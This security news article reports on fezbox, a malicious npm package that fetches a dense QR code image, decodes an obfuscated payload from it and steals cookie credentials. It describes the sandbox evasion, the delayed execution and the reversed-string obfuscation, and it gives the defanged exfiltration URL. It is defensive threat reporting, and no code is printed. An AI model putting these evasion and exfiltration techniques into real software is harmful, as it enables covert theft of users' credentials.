Malicious npm Package Used QR Codes to Deliver Cookie-Stealing Malware

Researchers have uncovered a malicious npm package named fezbox that steals victims’ cookies by downloading an obfuscated payload hidden inside a dense QR code.

Specialists at Socket say the attackers used QR codes as a covert delivery channel. The package contains instructions to fetch a JPG that holds a high-density QR code. The package decodes that image and executes an obfuscated payload as the attack’s second stage — all designed to avoid detection.

By the time npm administrators removed the package, it had been downloaded at least 327 times.

Where the payload lives and how it hides

BleepingComputer reports the primary malicious code is in dist/fezbox.cjs (version 1.3.0 cited as an example). That file is minified, but it becomes readable after formatting. The attackers add runtime checks to avoid non-production environments, which helps the code evade sandboxes and automated analysis.

Socket’s researchers explain: “Attackers don’t want to risk being caught in a virtual or any non-production environment, so they add restrictions on when and how their exploit runs.” If the checks pass, the package waits 120 seconds, then parses and executes the QR-decoded code. The URL stored in the code is intentionally reversed — a simple obfuscation trick to hide http(s):// strings from static scanners.

An unusual, high-density QR code

This QR code is far denser than the ones most people scan with a phone. It holds obfuscated code rather than a simple URL or contact data, and ordinary phone cameras cannot read it. The attackers crafted the image specifically so the package’s decoder can parse out the payload.

What the malware does

Once decoded and executed, the obfuscated payload reads cookies via document.cookie. Researchers found it looks for credentials by applying another common obfuscation: reversing strings (for example, 'drowssap' → 'password'). If the cookie contains both username and password fields, the malware sends the data via an HTTPS POST to:
https://my-nest-app-production[.]up[.]railway[.]app/users (dots obfuscated in reporting).

If the required fields aren’t present, the code terminates quietly.

Why this matters

This campaign demonstrates a new method of abusing images for covert command-and-control and data exfiltration. An infected machine can fetch a seemingly innocuous image (standard image traffic) while the QR payload carries executable instructions. To network tools and proxies, the activity looks like normal image downloads, making detection harder.